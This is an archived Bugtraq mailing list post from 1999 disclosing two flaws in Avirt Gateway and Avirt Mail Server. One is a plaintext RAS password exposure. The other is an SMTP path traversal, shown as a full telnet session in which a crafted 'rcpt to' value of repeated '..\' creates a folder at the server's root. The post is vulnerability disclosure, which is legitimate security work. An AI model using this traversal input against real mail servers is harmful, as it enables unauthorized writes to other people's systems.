Bugtraq mailing list archives
Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow vulnerability
From: aguileta () EUNATE NET (Jesús López de Aguileta)
Date: Tue, 2 Nov 1999 16:12:41 +0100
----- Original Message ----- From: Luciano Martins <luck () USSRBACK COM> To: <BUGTRAQ () SECURITYFOCUS COM> Sent: Monday, November 01, 1999 9:57 AM Subject: Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow vulnerability
Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow vulnerability
I post another 2 bugs concerning Avirt Gateway and Avirt Mail Server 3.3 and 3.5 in BUGTRAQ-ES a month ago. I will try (excuse my poor English) to translate this message here. 1) Anybody with console access could retrieve RAS password in Avirt Gateway. Changing the username in "Internet connection" properties and pressing "test" button makes Avirt to present a message box with the password in plaintext. 2) Anybody on the Intranet could make directories anywhere in the NT running Avirt Mail Server. telnet 192.168.0.1 25
220 server aVirt Mail SMTP Server Ready.
mail from:foo
250 foo, Sender OK
rcpt to:..\..\..\..\newfolder
250 ..\..\..\..\newfolder, Receipient OK
data
354 Please enter mail, ending with a "." on a line by itself
Textinside .
250 Mail accepted.
This will create a root folder named "newfolder" with a file inside it. Fortunately it appears to be impossible to overwrite an existing directory. Avirt has been notified about this security flaws on 23/8/99 Regards Jesús López de Aguileta EunateNet
Current thread:
- Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow vulnerability Luciano Martins (Nov 01)
- Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow vulnerability Jesús López de Aguileta (Nov 02)